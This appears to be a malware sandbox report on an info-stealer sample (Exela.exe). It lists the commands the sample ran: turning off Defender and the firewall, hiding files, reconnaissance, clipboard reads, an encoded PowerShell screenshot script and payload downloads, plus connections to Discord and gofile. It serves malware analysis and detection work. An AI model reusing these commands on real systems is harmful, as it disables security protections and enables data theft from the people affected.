PID 4472 wrote to memory of 4724 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2556 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 952 wrote to memory of 5748 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 5748 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 5748 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5748 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 952 wrote to memory of 5548 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 5548 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Users\Admin\AppData\Local\Temp\no defender.exe

"C:\Users\Admin\AppData\Local\Temp\no defender.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "gdb --version"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get Manufacturer

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get Manufacturer

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\system32\cmd.exe

cmd.exe /c chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\curl.exe

curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gxl5eawx\gxl5eawx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD52.tmp" "c:\Users\Admin\AppData\Local\Temp\gxl5eawx\CSCA2000AA099924A6D852CCA33F2F612C8.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:50065 tcp
N/A 127.0.0.1:50084 tcp
N/A 127.0.0.1:50107 tcp
N/A 127.0.0.1:50112 tcp
N/A 127.0.0.1:50114 tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
FR 51.75.242.210:443 api.gofile.io tcp
N/A 127.0.0.1:50282 tcp
N/A 127.0.0.1:50284 tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.135.232:443 discord.com tcp

Files

memory/3132-0-0x0000000000F60000-0x000000000218E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Exela.exe

MD5 c5669d422429ecf07edc2f00821ecd93
SHA1 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3
SHA256 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00
SHA512 d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253

C:\Users\Admin\AppData\Local\Temp\no defender.exe

MD5 c80d2a00b97cf55170b221f8a8f65e81
SHA1 a03c17751d8db91e1e66460093855dabbcfcc04b
SHA256 af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85
SHA512 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat

MD5 bffa0b357688d06c9f66c79a5d091f8b
SHA1 bc20d3a70777c646a86e5c4b98f3a038f0821106
SHA256 d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df
SHA512 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40x2aptv.km3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\_MEI2482\ucrtbase.dll

MD5 3b337c2d41069b0a1e43e30f891c3813
SHA1 ebee2827b5cb153cbbb51c9718da1549fa80fc5c
SHA256 c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7
SHA512 fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

C:\Users\Admin\AppData\Local\Temp\_MEI2482\python311.dll

MD5 db09c9bbec6134db1766d369c339a0a1
SHA1 c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b
SHA256 b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79
SHA512 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45

C:\Users\Admin\AppData\Local\Temp\_MEI2482\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

memory/952-128-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

